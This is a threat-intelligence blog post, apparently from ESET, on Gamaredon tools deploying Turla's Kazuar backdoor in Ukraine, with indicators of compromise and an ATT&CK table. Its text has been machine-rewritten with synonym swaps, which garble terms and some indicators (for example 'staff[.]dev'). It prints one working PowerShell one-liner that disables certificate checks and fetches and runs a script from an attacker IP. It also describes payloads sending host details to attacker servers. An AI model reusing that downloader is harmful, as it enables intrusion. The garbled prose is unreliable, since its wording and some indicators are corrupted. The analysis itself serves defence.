Gamaredon X Turla collab

On this blogpost, we discover the primary identified instances of collaboration between Gamaredon and Turla, in Ukraine.

Key issues of this blogpost:

• In February 2025, we came upon that the Gamaredon software PteroGraphin used to be used to restart Turla’s Kazuar backdoor on a device in Ukraine.
• In April and June 2025, we detected that Kazuar v2 used to be deployed the use of Gamaredon gear PteroOdd and PteroPaste.
• Those discoveries lead us to imagine with excessive self belief that Gamaredon is participating with Turla.
• Turla’s sufferer depend could be very low in comparison to the selection of Gamaredon compromises, suggesting that Turla select essentially the most treasured machines.
• Each teams are affiliated with the FSB, Russia’s major home intelligence and safety firm.

Danger actor profiles

Gamaredon

Gamaredon has been energetic since no less than 2013. It’s accountable for lots of assaults, most commonly in opposition to Ukrainian governmental establishments, as evidenced through the years in numerous studies from CERT-UA and from different authentic Ukrainian our bodies. Gamaredon has been attributed by means of the Safety Carrier of Ukraine (SSU) to the Heart 18 of Knowledge Safety of the FSB, working out of occupied Crimea. We imagine this crew to be participating with every other risk actor that we came upon and named InvisiMole.

Turla

Turla, sometimes called Snake, is an notorious cyberespionage crew that has been energetic since no less than 2004, most likely extending again into the overdue Nineties. It’s regarded as a part of the FSB. It basically specializes in high-profile objectives, akin to governments and diplomatic entities, in Europe, Central Asia, and the Center East. It’s identified for having breached main organizations akin to the United States Division of Protection in 2008 and the Swiss protection corporate RUAG in 2014. Throughout the previous few years, now we have documented a big a part of Turla’s arsenal at the WeLiveSecurity weblog and in non-public studies.

Review

In February 2025, by the use of ESET telemetry, we detected 4 other Gamaredon-Turla co-compromises in Ukraine. On the ones machines, Gamaredon deployed a variety of gear, together with PteroLNK, PteroStew, PteroOdd, PteroEffigy, and PteroGraphin, whilst Turla best deployed Kazuar v3.

On a kind of machines, we have been ready to seize a payload appearing that Turla is in a position to factor instructions by the use of Gamaredon implants. PteroGraphin used to be used to restart Kazuar, most likely after Kazuar crashed or used to be now not introduced routinely. Thus, PteroGraphin used to be most probably used as a restoration means by means of Turla. That is the primary time that we’ve got been ready to hyperlink those two teams in combination by the use of technical signs (see First chain: Restart of Kazuar v3).

As a result of, in all 4 instances, the ESET endpoint product used to be put in after the compromises we’re not able to pinpoint the precise compromise means. Then again, Gamaredon is understood for the use of spearphishing and malicious LNK recordsdata on detachable drives (as defined in our contemporary blogpost) so we presume that this type of is the in all probability compromise vector.

In April and June 2025, we detected Kazuar v2 installers being deployed immediately by means of Gamaredon gear (see 2nd chain: Deployment of Kazuar v2 by the use of PteroOdd and 3rd chain: Deployment of Kazuar v2 by the use of PteroPaste). This presentations that Turla is actively participating with Gamaredon to achieve get entry to to precise machines in Ukraine.

Victimology

During the last 18 months now we have detected Turla on seven machines in Ukraine. We imagine that Gamaredon compromised the primary 4 machines in January 2025, whilst Turla deployed Kazuar v3 in February 2025. In all instances, the ESET endpoint product used to be best put in after each compromises.

It’s price noting that, previous to this, the ultimate time we detected a Turla compromise in Ukraine used to be in February 2024.

All the ones components, and the truth that Gamaredon is compromising loads if now not hundreds of machines, counsel that Turla is best in particular machines, most probably ones containing extremely delicate intelligence.

Attribution

Gamaredon

In the ones compromises, we detected PteroLNK, PteroStew, and PteroGraphin, which we imagine are unique to Gamaredon.

Turla

In a similar fashion, for Turla, we detected using Kazuar v2 and Kazuar v3, which we imagine are unique to that crew.

Gamaredon-Turla collaboration hypotheses

In 2020, we confirmed that Gamaredon supplied get entry to to InvisiMole (see our white paper), so it isn’t the primary time that Gamaredon has collaborated with every other Russia-aligned risk actor.

However, Turla is understood for hijacking different risk actors’ infrastructure to get an preliminary foothold in its objectives’ networks. During the last years, a number of instances were publicly documented:

• In 2019, Symantec printed a blogpost appearing that Turla hijacked OilRig (an Iran-aligned crew) infrastructure to secret agent on a Center Japanese goal.
• In 2023, Mandiant printed a blogpost appearing that Turla reregistered expired Andromeda C&C domain names as a way to compromise objectives in Ukraine.
• In 2024, Microsoft printed two blogposts (first and 2nd) appearing that Turla hijacked the cybercrime botnet Amadey and infrastructure of the cyberespionage crew SideCopy (a Pakistan-aligned crew) as a way to deploy Kazuar.

Notice that each Gamaredon and Turla are a part of the Russian Federal Safety Carrier (FSB). Gamaredon is regarded as operated by means of officials of Heart 18 of the FSB (aka the Heart for Knowledge Safety) in Crimea (see this record from the Safety Carrier of Ukraine), which is a part of the FSB’s counterintelligence carrier. As for Turla, the United Kingdom’s NCSC attributes the gang to the Heart 16 of the FSB, which is Russia’s major alerts intelligence (SIGINT) firm.

Subsequently, we advise 3 hypotheses to give an explanation for our observations:

• Very most likely: For the reason that each teams are a part of the Russian FSB (although in two other Facilities), Gamaredon supplied get entry to to Turla operators in order that they may factor instructions on a selected device to restart Kazuar, and deploy Kazuar v2 on some others.
• Not likely: Turla compromised Gamaredon infrastructure and leveraged this get entry to to get better get entry to on a device in Ukraine. Since PteroGraphin accommodates a hardcoded token that permits editing the C&C pages, this risk can’t be totally discarded. Then again, it signifies that Turla used to be ready to breed the overall Gamaredon chain.
• Not likely: Gamaredon has get entry to to Kazuar and deploys it on very particular machines. Given Gamaredon’s noisy means, we don’t suppose it might be that cautious deploying Kazuar on just a very restricted set of sufferers.

Geopolitical context

From an organizational viewpoint, it’s price noting that the 2 entities recurrently related to Turla and Gamaredon have a protracted historical past of reported collaboration, which will also be traced again to the Chilly Warfare generation.

The FSB’s Heart 16 (which is assumed to harbor Turla) is an immediate inheritor to the KGB’s 16^th Directorate, which used to be basically accountable for overseas SIGINT assortment – the patience of the quantity 16 is actually seemed by means of observers as an indication of the FSB management’s want to emphasise a ancient lineage. Heart 18 (which is most often related to Gamaredon) maintains a coarse association with the KGB’s 2^nd Leader Directorate, which used to be accountable for inner safety throughout the Soviet Union. Throughout the Soviet generation, each organizations regularly labored hand in hand, sharing tasks for tracking overseas embassies on Russian soil as an example.

Then and now, such collaborations replicate the Russian strategic tradition and philosophy of a herbal continuity between inner safety and nationwide protection. Even supposing Heart 16 continues to be tasked with overseas intelligence assortment and Heart 18 is theoretically a part of the FSB’s counterintelligence equipment, each entities appear to care for some challenge overlaps – particularly in regards to former Soviet republics. In 2018, the Safety Carrier of Ukraine (SBU) had already noticed Facilities 16 and 18 it appears carrying out a joint cyberespionage marketing campaign (named SpiceyHoney). The 2022 full-scale invasion of Ukraine has most probably bolstered this convergence, with ESET knowledge obviously appearing Gamaredon and Turla actions that specialize in the Ukrainian protection sector in contemporary months.

Even supposing the Russian intelligence group is understood for its fierce inner rivalries, there are indications that such tensions mainly practice to interservice members of the family slightly than to intra-agency interactions. On this context, it’s possibly now not completely unexpected that APT teams working inside those two FSB Facilities are noticed cooperating to some degree.

First chain: Restart of Kazuar v3

In February 2025, we detected the execution of Kazuar by means of PteroGraphin and PteroOdd on a device in Ukraine. On this phase we element the precise chain that we detected.

Timeline

The whole timeline for this device is the next:

• 2025-01-20: Gamaredon deployed PteroGraphin at the device. Notice that the date is from the report introduction timestamp supplied by means of Home windows, which may have been tampered with.
• 2025-02-11: Turla deployed Kazuar v3 at the device. Notice that the date is from the report introduction timestamp supplied by means of Home windows, which may have been tampered with.
• 2025-02-27 15:47:39 UTC: PteroGraphin downloaded PteroOdd.
• 2025-02-27 15:47:56 UTC: PteroOdd downloaded a payload, which finished Kazuar.
• 2025-02-28 15:17:14 UTC: PteroOdd downloaded every other payload, which additionally finished Kazuar.

Hereafter, we suppose those dates to be unaltered.

Main points of the occasions

Since January 20^th, 2025, PteroGraphin (see Determine 1) used to be provide at the device at %APPDATAp.cx86.ps1. This is a downloader that gives an encrypted channel for handing over payloads by the use of Telegra.ph, a internet carrier operated by means of Telegram that allows simple introduction of internet pages. Notice that PteroGraphin accommodates a token to edit the Telegra.ph web page, so someone with wisdom of this token (Turla, for instance, although not likely) may just manipulate the contents.

On February 27^th, 2025, at 15:47:39 UTC, as proven in Determine 2, we detected a answer from https://api.telegra[.]ph/getPage/SecurityHealthSystray-01-20?return_content=true.

The information in kids will also be decrypted the use of the hardcoded 3DES key and IV from the PteroGraphin script above, which supplies:

powershell -windowStyle hidden -EncodedCommand

The decoded payload is every other PowerShell downloader that we named PteroOdd, proven in Determine 3.

On February 27^th, 2025 at 15:47:56 UTC, we detected a request to https://api.telegra[.]ph/getPage/dinoasjdnl-02-27?return_content=true; the answer is proven in Determine 4. Notice that the replies for PteroOdd aren’t encrypted.

The decoded command is proven in Determine 5.

The payload first uploads the sufferer’s laptop identify and device force’s quantity serial quantity to the Cloudflare employee subdomain https://lucky-king-96d6.mopig92456.staff[.]dev.

What’s maximum fascinating is the ultimate line:

Get started-Procedure -FilePath “C:Customers[redacted]AppDataLocalProgramsSonyAudioDriversvncutil64.exe”

That is the trail to the applying this is run to execute Kazuar by means of side-loading it. The ESET endpoint product detected a KERNEL Kazuar v3 payload (agent_label is AGN-RR-01) in reminiscence and loaded from this procedure. It isn’t transparent to us why Turla operators had to make use of PteroGraphin to release Kazuar, however it’s imaginable that Kazuar by hook or by crook stopped running after the ESET product set up and that they needed to restart the implant. Notice that we didn’t see Gamaredon downloading Kazuar; it used to be provide at the device since February 11^th, 2025, earlier than the ESET product used to be put in.

Then, on February 28^th, 2025 at 15:17:14 UTC, we detected every other an identical PowerShell script, proven in Determine 6.

The primary strains and the Cloudflare employee subdomain are equivalent. It begins the similar vncutil64.exe but in addition a 2nd executable, LaunchGFExperience.exe, which side-loads LaunchGFExperienceLOC.dll – the Kazuar loader. We then detected in reminiscence, within the LaunchGFExperience.exe procedure, every other KERNEL Kazuar v3 payload (agent_label is AGN-XX-01). It isn’t transparent why two other KERNEL Kazuar v3 payloads have been provide at the identical device.

In the end, an HTTP POST request, with the checklist of working processes, used to be despatched to https://eset.ydns[.]ecu/submit.php. The Turla operators in all probability sought after affirmation that Kazuar used to be effectively introduced.

On March 10^th, 2025 at 07:05:32 UTC, we detected every other pattern of PteroOdd, which makes use of the C&C URL https://api.telegra[.]ph/getPage/canposgam-03-06?return_content=true. This pattern used to be detected on a unique device in Ukraine, on which Kazuar used to be additionally provide.

The decoded payload is proven in Determine 7 and presentations that it additionally makes use of eset.ydns[.]ecu, whilst now not interacting with any Turla pattern.

However, we famous that the downloaded payload uploads the next items of data to https://eset.ydns[.]ecu/submit.php:

Then again, we aren’t conscious about any .NET software this is recently being utilized by Gamaredon, whilst there are a number of of them utilized by Turla, together with Kazuar. Thus, it’s imaginable that those uploaded items of data are for Turla, and we assess with medium self belief that the area eset.ydns[.]ecu is managed by means of Turla.

The extra base64-encoded PowerShell command is a brand new downloader that abuses api.gofile[.]io; we named it PteroEffigy.

Kazuar v3

Kazuar v3 is the most recent department of the Kazuar circle of relatives, itself a complicated C# espionage implant that we imagine is used solely by means of Turla because it used to be first noticed in 2016. Kazuar v2 and v3 are basically the similar malware circle of relatives and proportion the similar codebase. Then again, some main adjustments were presented.

Kazuar v3 incorporates round 35% extra C# strains than Kazuar v2 and introduces further community shipping strategies: over internet sockets and Change Internet Services and products. Kazuar v3 may have certainly one of 3 roles (KERNEL, BRIDGE, or WORKER), and malware functionalities are divided amongst the ones roles. For instance, best BRIDGE communicates with the C&C server.

2nd chain: Deployment of Kazuar v2 by the use of PteroOdd

On one of the most Ukrainian machines discussed within the earlier phase, we detected every other fascinating compromise chain on April 18^th, 2025.

On April 18^th, 2025 at 15:26:14 UTC, we detected a PteroOdd pattern (a Gamaredon software) downloading a payload from https://api.telegra[.]ph/getPage/scrsskjqwlbw-02-28?return_content=true. The downloaded script, proven in Determine 8, is very similar to the payload described within the first chain, however accommodates an extra base64-encoded script, which is the PowerShell downloader PteroEffigy.

This PowerShell payload downloads every other payload from https://eset.ydns[.]ecu/scrss.ps1 and executes it.

scrss.ps1 became out to be an installer for Turla’s Kazuar v2, which used to be up to now analyzed intimately by means of Unit42. This presentations that Gamaredon deployed Kazuar, in all probability on behalf of Turla.

The Kazuar agent_label is AGN-AB-26 and the 3 C&C servers are:

• https://abrargeospatial[.]ir/wp-includes/fonts/wp-icons/index.php
• https://www.brannenburger-nagelfluh[.]de/wp-includes/style-engine/css/index.php
• https://www.pizzeria-mercy[.]de/wp-includes/pictures/media/bar/index.php

It’s price noting that Turla assists in keeping the use of compromised WordPress servers as C&Cs for Kazuar.

Apparently, it kind of feels that Kazuar v2 continues to be maintained in parallel to Kazuar v3. For instance, the hot updates to the backdoor instructions in Kazuar v3 also are incorporated on this AGN-AB-26 model.

3rd chain: Deployment of Kazuar v2 by the use of PteroPaste

On June 5^th and six^th, 2025, we detected Gamaredon deploying a Turla implant on two machines in Ukraine. In each instances, Gamaredon’s PteroPaste used to be stuck seeking to execute the straightforward PowerShell script proven in Determine 9.

The base64-encoded string is the next downloader in PowerShell:

[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};iex(New-Object Internet.WebClient).downloadString(‘https://91.231.182[.]187/ekrn.ps1’);

The downloaded script ekrn.ps1 is similar to scrss.ps1 discussed in the second one chain. This additionally drops and installs Kazuar v2.

Each samples have an agent_label of AGN-AB-27 and the C&C servers are the similar as the ones within the pattern from the second one chain:

• https://www.brannenburger-nagelfluh[.]de/wp-includes/style-engine/css/index.php
• https://www.pizzeria-mercy[.]de/wp-includes/pictures/media/bar/index.php
• https://abrargeospatial[.]ir/wp-includes/fonts/wp-icons/index.php

ekrn.exe is a sound means of ESET endpoint safety merchandise. Thus, Turla most probably attempted to masquerade because it as a way to fly beneath the radar. Additionally word that ekrn.ydns[.]ecu resolves to 91.231.182[.]187.

In the end, we additionally discovered on VirusTotal a VBScript variant of the Kazuar v2 PowerShell installer. It used to be uploaded from Kyrgyzstan on June 5^th, 2025. This implies that Turla is focused on objectives out of doors of Ukraine as neatly.

Conclusion

On this blogpost, now we have proven how Turla used to be ready to leverage implants operated by means of Gamaredon (PteroGraphin, PteroOdd, and PteroPaste) as a way to restart Kazuar v3 and deploy Kazuar v2 on a number of machines in Ukraine. We now imagine with excessive self belief that each teams – one by one related to the FSB – are cooperating and that Gamaredon is offering preliminary get entry to to Turla.

For any inquiries about our analysis printed on WeLiveSecurity, please touch us at threatintel@eset.com. 

ESET Analysis gives non-public APT intelligence studies and knowledge feeds. For any inquiries about this carrier, consult with the ESET Danger Intelligence web page.

IoCs

A complete checklist of signs of compromise (IoCs) and samples will also be present in our GitHub repository.

Information

SHA-1	Filename	Detection	Description
7DB790F75829D3E6207D8EC1CBCD3C133F596D67	N/A	PowerShell/Pterodo.QB	PteroOdd.
2610A899FE73B8F018D19B50BE55D66A6C78B2AF	N/A	PowerShell/Pterodo.QB	PteroOdd.
3A24520566BBE2E262A2911E38FD8130469BA830	N/A	PowerShell/Pterodo.QB	PteroOdd.
DA7D5B9AB578EF6487473180B975A4B2701FDA9E	scrss.ps1	PowerShell/Turla.AI	Kazuar v2 installer.
D7DF1325F66E029F4B77E211A238AA060D7217ED	N/A	MSIL/Turla.N.gen	Kazuar v2.
FF741330CC8D9624D791DE9074086BBFB0E257DC	N/A	PowerShell/TrojanDownloader.Agent.DV	PowerShell downloader finished by means of PteroPaste.
A7ACEE41D66B537D900403F0E6A26AB6A1290A32	ekrn.ps1	PowerShell/Turla.AJ	Kazuar v2 installer.
54F2245E0D3ADEC566E4D822274623BF835E170C	N/A	MSIL/Agent_AGen.CZQ	Kazuar v2.
371AB9EB2A3DA44099B2B7716DE0916600450CFD	ekrn.ps1	PowerShell/Turla.AJ	Kazuar v2 installer.
4A58365EB8F928EC3CD62FF59E59645C2D8C0BA5	N/A	MSIL/Turla.W	Kazuar v2.
214DC22FA25314F9C0DDA54F669EDE72000C85A4	Sandboxie.vbs	VBS/Turla.C	Kazuar v2 installer – VBScript variant.

Community

IP	Area	Webhosting supplier	First noticed	Main points
N/A	lucky-king-96d6.mopig92456.staff[.]dev	N/A	2025‑02‑28	Cloudflare employee present in payloads downloaded by means of PteroOdd.
64.176.173[.]164	eset.ydns[.]ecu	The Consistent Corporate, LLC	2025‑03‑01	C&C server present in payloads downloaded by means of PteroOdd.
85.13.145[.]231	hauptschule-schwalbenstrasse[.]de	Neue Medien Muennich GmbH	2024‑06‑06	Compromised WordPress web site used as Kazuar C&C.
91.231.182[.]187	ekrn.ydns[.]ecu	South Park Networks LLC	2025‑06‑05	C&C server in payloads downloaded by means of PteroPaste.
185.118.115[.]15	fjsconsultoria[.]com	Dream Fusion – IT Services and products, Lda	2024‑06‑26	Compromised WordPress web site used as Kazuar C&C.
77.46.148[.]242	ingas[.]rs	TELEKOM SRBIJA a.d.	2024‑06‑03	Compromised WordPress web site used as Kazuar C&C.
168.119.152[.]19	abrargeospatial[.]ir	Hetzner On-line GmbH	2023‑11‑13	Compromised WordPress web site used as Kazuar C&C.
217.160.0[.]33	www.brannenburger-nagelfluh[.]de	IONOS SE	2019‑06‑06	Compromised WordPress web site used as Kazuar C&C.
217.160.0[.]159	www.pizzeria-mercy[.]de	IONOS SE	2023‑10‑05	Compromised WordPress web site used as Kazuar C&C.

MITRE ATT&CK ways

This desk used to be constructed the use of model 17 of the MITRE ATT&CK framework.

Tactic	ID	Identify	Description
Useful resource Building	T1583.001	Achieve Infrastructure: Domain names	Gamaredon or Turla registered a site at a unfastened dynamic DNS supplier.
	T1583.004	Achieve Infrastructure: Server	Gamaredon or Turla rented a server at Vultr.
	T1583.007	Achieve Infrastructure: Serverless	Gamaredon created Cloudflare staff and Telegra.ph pages.
	T1584.003	Compromise Infrastructure: Digital Non-public Server	Turla compromised WordPress web sites.
	T1608	Level Functions	Turla staged Kazuar installer scripts on its C&C servers.
Execution	T1059.001	Command and Scripting Interpreter: PowerShell	PteroGraphin is evolved in PowerShell.
Endurance	T1574.002	Hijack Execution Go with the flow: DLL Facet-Loading	Kazuar loaders use DLL side-loading.
Protection Evasion	T1140	Deobfuscate/Decode Information or Knowledge	The Kazuar payload is XOR encrypted and all Kazuar strings are encrypted by the use of substitution tables.
	T1480.001	Execution Guardrails: Environmental Keying	Kazuar loaders decrypt the payloads, the use of the device identify as the important thing.
	T1036.005	Masquerading: Fit Legit Identify or Location	Kazuar loaders are situated in legitimate-looking directories akin to C:Program Information (x86)Brother PrinterApp or %LOCALAPPDATAp.cProgramsSonyAudioDrivers.
Discovery	T1057	Procedure Discovery	The PowerShell script beginning Kazuar v3 sends the checklist of working processes to its C&C server.
	T1012	Question Registry	The PowerShell script beginning Kazuar v3 will get the PowerShell model from the registry.
	T1082	Device Knowledge Discovery	The PowerShell script beginning Kazuar v3 exfiltrates the ultimate boot time, OS model, and OS structure.
	T1083	Record and Listing Discovery	The PowerShell script beginning Kazuar v3 lists recordsdata within the directories %TEMP% and %APPDATAp.cMicrosoftWindows.
Command and Regulate	T1071.001	Utility Layer Protocol: Internet Protocols	PteroGraphin and Kazuar use HTTPS.
	T1573.001	Encrypted Channel: Symmetric Cryptography	PteroGraphin decrypts the C&C answer the use of 3DES.
	T1102	Internet Carrier	Legit internet products and services, akin to Telegra.ph, have been used on this marketing campaign.